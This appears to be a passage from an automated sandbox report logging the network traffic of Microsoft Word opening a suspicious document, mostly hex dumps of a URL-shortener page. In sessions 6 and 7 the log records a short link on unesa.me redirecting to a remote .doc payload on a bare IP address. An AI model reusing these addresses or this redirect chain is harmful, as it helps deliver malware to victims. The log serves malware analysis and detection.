                                              2023-06-13 09:01:12 UTC21OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6f 63 64 6a 30 69 6c 76 73 70 62 37 32 75 76 73 32 35 66 39 71 6d 39 6e 31 6e 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 75 6e 65 73 61 2e 6d 65 0d 0a 0d 0a
                                              Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveCookie: PHPSESSID=ocdj0ilvspb72uvs25f9qm9n1nUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: unesa.me
                                              2023-06-13 09:01:13 UTC21INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Tue, 13 Jun 2023 09:01:13 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              X-XSS-Protection: 1; mode=block
                                              Vary: Accept-Encoding
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: sameorigin
                                              Strict-Transport-Security: max-age=15768000;
                                              2023-06-13 09:01:13 UTC22INData Raw: 31 39 32 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 64 22 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 21 2d 2d 20 52 65 71 75 69 72 65 64 20 6d 65 74 61 20 74 61 67 73 20 2d 2d 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 55 72 6c 20 53 68 6f 72 74 65 6e 65 72 20 55 6e 65 73 61 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6d 65
                                              Data Ascii: 192c<!doctype html><html lang="id"> <head> ... Required meta tags --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>Url Shortener Unesa</title> <me
                                              2023-06-13 09:01:13 UTC22INData Raw: 65 65 6e 2d 77 72 61 70 70 65 72 22 20 63 6c 61 73 73 3d 22 73 63 72 65 65 6e 2d 6c 61 6e 64 69 6e 67 22 20 64 61 74 61 2d 73 63 72 65 65 6e 2d 6e 61 6d 65 3d 22 6c 61 6e 64 69 6e 67 22 20 6f 6e 6c 6f 61 64 3d 22 6c 6f 61 64 28 29 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 62 6f 74 72 6f 6e 20 6a 75 6d 62 6f 74 72 6f 6e 2d 66 6c 75 69 64 20 6c 61 6e 64 69 6e 67 2d 68 65 72 6f 20 6d 62 2d 30 20 6d 62 2d 6d 64 2d 34 20 62 67 31 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 6c 67 20 6e 61 76 62 61 72 2d 64 61 72 6b 20 20 70 74 2d 34 20 70 74 2d 6d 64 2d 35 20 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 20
                                              Data Ascii: een-wrapper" class="screen-landing" data-screen-name="landing" onload="load()"> <div class="jumbotron jumbotron-fluid landing-hero mb-0 mb-md-4 bg1"> <nav class="navbar navbar-expand-lg navbar-dark pt-4 pt-md-5 "> <div class="
                                              2023-06-13 09:01:13 UTC24INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 2d 67 72 6f 75 70 20 69 6e 70 75 74 2d 67 72 6f 75 70 2d 6c 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 75 72 6c 22 20 69 64 3d 22 75 72 6c 22 20 6e 61 6d 65 3d 22 75 72 6c 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 20 62 6f 72 64 65 72 20 62 6f 72 64 65 72 2d 70 72 69 6d 61 72 79 20 70 74 2d 32 20 70 74 2d 73 6d 2d 30 20 70 62 2d 32 20 70 62 2d 73 6d 2d 30 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 55 52 4c 2f 20 54 61 75 74 61 6e 20 50 61 6e 6a 61 6e 67 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 65 6d 70 65 6c 20 74 61 75 74 61 6e 20
                                              Data Ascii: <div class="input-group input-group-lg"> <input type="url" id="url" name="url" class="form-control border border-primary pt-2 pt-sm-0 pb-2 pb-sm-0" placeholder="URL/ Tautan Panjang" aria-label="Tempel tautan
                                              2023-06-13 09:01:13 UTC25INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 49 4e 47 4b 41 54 4b 41 4e 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20
                                              Data Ascii: SINGKATKAN</button> </div> </div> </form> </div> </div> </div> </div>
                                              2023-06-13 09:01:13 UTC27INData Raw: 65 72 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 33 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 6e 65 73 61 2e 61 63 2e 69 64 22 3e 55 4e 45 53 41 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c
                                              Data Ascii: er" style="padding-top: 30px; text-align: center;"> <li class="nav-item"> <a class="nav-link" href="https://unesa.ac.id">UNESA</a> </li> <l


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              5192.168.2.2249186103.242.124.88443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampkBytes transferredDirectionData
                                              2023-06-13 09:01:13 UTC28OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6f 63 64 6a 30 69 6c 76 73 70 62 37 32 75 76 73 32 35 66 39 71 6d 39 6e 31 6e 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 75 6e 65 73 61 2e 6d 65 0d 0a 0d 0a
                                              Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveCookie: PHPSESSID=ocdj0ilvspb72uvs25f9qm9n1nUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: unesa.me
                                              2023-06-13 09:01:14 UTC28INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Tue, 13 Jun 2023 09:01:14 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              X-XSS-Protection: 1; mode=block
                                              Vary: Accept-Encoding
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: sameorigin
                                              Strict-Transport-Security: max-age=15768000;
                                              2023-06-13 09:01:14 UTC28INData Raw: 65 39 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 64 22 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 21 2d 2d 20 52 65 71 75 69 72 65 64 20 6d 65 74 61 20 74 61 67 73 20 2d 2d 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 55 72 6c 20 53 68 6f 72 74 65 6e 65 72 20 55 6e 65 73 61 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6d 65 74
                                              Data Ascii: e91<!doctype html><html lang="id"> <head> ... Required meta tags --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>Url Shortener Unesa</title> <met
                                              2023-06-13 09:01:14 UTC29INData Raw: 65 6e 2d 77 72 61 70 70 65 72 22 20 63 6c 61 73 73 3d 22 73 63 72 65 65 6e 2d 6c 61 6e 64 69 6e 67 22 20 64 61 74 61 2d 73 63 72 65 65 6e 2d 6e 61 6d 65 3d 22 6c 61 6e 64 69 6e 67 22 20 6f 6e 6c 6f 61 64 3d 22 6c 6f 61 64 28 29 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 62 6f 74 72 6f 6e 20 6a 75 6d 62 6f 74 72 6f 6e 2d 66 6c 75 69 64 20 6c 61 6e 64 69 6e 67 2d 68 65 72 6f 20 6d 62 2d 30 20 6d 62 2d 6d 64 2d 34 20 62 67 31 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 6c 67 20 6e 61 76 62 61 72 2d 64 61 72 6b 20 20 70 74 2d 34 20 70 74 2d 6d 64 2d 35 20 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 20 63
                                              Data Ascii: en-wrapper" class="screen-landing" data-screen-name="landing" onload="load()"> <div class="jumbotron jumbotron-fluid landing-hero mb-0 mb-md-4 bg1"> <nav class="navbar navbar-expand-lg navbar-dark pt-4 pt-md-5 "> <div class=" c
                                              2023-06-13 09:01:14 UTC31INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 2d 67 72 6f 75 70 20 69 6e 70 75 74 2d 67 72 6f 75 70 2d 6c 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 75 72 6c 22 20 69 64 3d 22 75 72 6c 22 20 6e 61 6d 65 3d 22 75 72 6c 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 20 62 6f 72 64 65 72 20 62 6f 72 64 65 72 2d 70 72 69 6d 61 72 79 20 70 74 2d 32 20 70 74 2d 73 6d 2d 30 20 70 62 2d 32 20 70 62 2d 73 6d 2d 30 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 55 52 4c 2f 20 54 61 75 74 61 6e 20 50 61 6e 6a 61 6e 67 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 65 6d 70 65 6c 20 74 61 75 74 61 6e 20 75
                                              Data Ascii: <div class="input-group input-group-lg"> <input type="url" id="url" name="url" class="form-control border border-primary pt-2 pt-sm-0 pb-2 pb-sm-0" placeholder="URL/ Tautan Panjang" aria-label="Tempel tautan u
                                              2023-06-13 09:01:14 UTC32INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 49 4e 47 4b 41 54 4b 41 4e 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 3c 2f 64 69
                                              Data Ascii: SINGKATKAN</button> </div> </div> </form> </div> </div> </div> </di
                                              2023-06-13 09:01:14 UTC33INData Raw: 74 2d 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 33 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 6e 65 73 61 2e 61 63 2e 69 64 22 3e 55 4e 45 53 41 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: t-center" style="padding-top: 30px; text-align: center;"> <li class="nav-item"> <a class="nav-link" href="https://unesa.ac.id">UNESA</a> </li>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              6192.168.2.2249187103.242.124.88443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampkBytes transferredDirectionData
                                              2023-06-13 09:01:15 UTC35OUTGET /oaeopb HTTP/1.1
                                              Accept: */*
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                              UA-CPU: AMD64
                                              Accept-Encoding: gzip, deflate
                                              Host: unesa.me
                                              Connection: Keep-Alive
                                              Cookie: PHPSESSID=ocdj0ilvspb72uvs25f9qm9n1n
                                              2023-06-13 09:01:15 UTC35INHTTP/1.1 302 Found
                                              Server: nginx
                                              Date: Tue, 13 Jun 2023 09:01:15 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 0
                                              Connection: close
                                              X-XSS-Protection: 1; mode=block
                                              Location: http://15.223.2.12/we/wewewewewewewewew%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23ewewewewewewe.doc
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: sameorigin
                                              Strict-Transport-Security: max-age=15768000;


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              7192.168.2.2249189103.242.124.88443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampkBytes transferredDirectionData
                                              2023-06-13 09:01:16 UTC36OUTHEAD /oaeopb HTTP/1.1
                                              User-Agent: Microsoft Office Existence Discovery
                                              Host: unesa.me
                                              Content-Length: 0
                                              Connection: Keep-Alive
                                              Cookie: PHPSESSID=ocdj0ilvspb72uvs25f9qm9n1n
                                              2023-06-13 09:01:16 UTC36INHTTP/1.1 302 Found
                                              Server: nginx
                                              Date: Tue, 13 Jun 2023 09:01:16 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 0
                                              Connection: close
                                              X-XSS-Protection: 1; mode=block
                                              Location: http://15.223.2.12/we/wewewewewewewewew%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23ewewewewewewe.doc
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: sameorigin
                                              Strict-Transport-Security: max-age=15768000;


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              8192.168.2.2249191103.242.124.88443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampkBytes transferredDirectionData
                                              2023-06-13 09:01:21 UTC36OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6f 63 64 6a 30 69 6c 76 73 70 62 37 32 75 76 73 32 35 66 39 71 6d 39 6e 31 6e 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 75 6e 65 73 61 2e 6d 65 0d 0a 0d 0a
                                              Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveCookie: PHPSESSID=ocdj0ilvspb72uvs25f9qm9n1nUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: unesa.me
                                              2023-06-13 09:01:22 UTC36INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Tue, 13 Jun 2023 09:01:22 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              X-XSS-Protection: 1; mode=block
                                              Vary: Accept-Encoding
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: sameorigin
                                              Strict-Transport-Security: max-age=15768000;
                                              2023-06-13 09:01:22 UTC37INData Raw: 31 39 32 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 64 22 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 21 2d 2d 20 52 65 71 75 69 72 65 64 20 6d 65 74 61 20 74 61 67 73 20 2d 2d 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 55 72 6c 20 53 68 6f 72 74 65 6e 65 72 20 55 6e 65 73 61 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6d 65
                                              Data Ascii: 192c<!doctype html><html lang="id"> <head> ... Required meta tags --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>Url Shortener Unesa</title> <me
                                              2023-06-13 09:01:22 UTC38INData Raw: 65 65 6e 2d 77 72 61 70 70 65 72 22 20 63 6c 61 73 73 3d 22 73 63 72 65 65 6e 2d 6c 61 6e 64 69 6e 67 22 20 64 61 74 61 2d 73 63 72 65 65 6e 2d 6e 61 6d 65 3d 22 6c 61 6e 64 69 6e 67 22 20 6f 6e 6c 6f 61 64 3d 22 6c 6f 61 64 28 29 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 62 6f 74 72 6f 6e 20 6a 75 6d 62 6f 74 72 6f 6e 2d 66 6c 75 69 64 20 6c 61 6e 64 69 6e 67 2d 68 65 72 6f 20 6d 62 2d 30 20 6d 62 2d 6d 64 2d 34 20 62 67 31 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 6c 67 20 6e 61 76 62 61 72 2d 64 61 72 6b 20 20 70 74 2d 34 20 70 74 2d 6d 64 2d 35 20 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 20
                                              Data Ascii: een-wrapper" class="screen-landing" data-screen-name="landing" onload="load()"> <div class="jumbotron jumbotron-fluid landing-hero mb-0 mb-md-4 bg1"> <nav class="navbar navbar-expand-lg navbar-dark pt-4 pt-md-5 "> <div class="
                                              2023-06-13 09:01:22 UTC39INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 2d 67 72 6f 75 70 20 69 6e 70 75 74 2d 67 72 6f 75 70 2d 6c 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 75 72 6c 22 20 69 64 3d 22 75 72 6c 22 20 6e 61 6d 65 3d 22 75 72 6c 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 20 62 6f 72 64 65 72 20 62 6f 72 64 65 72 2d 70 72 69 6d 61 72 79 20 70 74 2d 32 20 70 74 2d 73 6d 2d 30 20 70 62 2d 32 20 70 62 2d 73 6d 2d 30 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 55 52 4c 2f 20 54 61 75 74 61 6e 20 50 61 6e 6a 61 6e 67 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 65 6d 70 65 6c 20 74 61 75 74 61 6e 20
                                              Data Ascii: <div class="input-group input-group-lg"> <input type="url" id="url" name="url" class="form-control border border-primary pt-2 pt-sm-0 pb-2 pb-sm-0" placeholder="URL/ Tautan Panjang" aria-label="Tempel tautan
                                              2023-06-13 09:01:22 UTC40INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 49 4e 47 4b 41 54 4b 41 4e 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20
                                              Data Ascii: SINGKATKAN</button> </div> </div> </form> </div> </div> </div> </div>
                                              2023-06-13 09:01:22 UTC42INData Raw: 65 72 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 33 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 6e 65 73 61 2e 61 63 2e 69 64 22 3e 55 4e 45 53 41 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c
                                              Data Ascii: er" style="padding-top: 30px; text-align: center;"> <li class="nav-item"> <a class="nav-link" href="https://unesa.ac.id">UNESA</a> </li> <l


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              9192.168.2.2249192103.242.124.88443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampkBytes transferredDirectionData
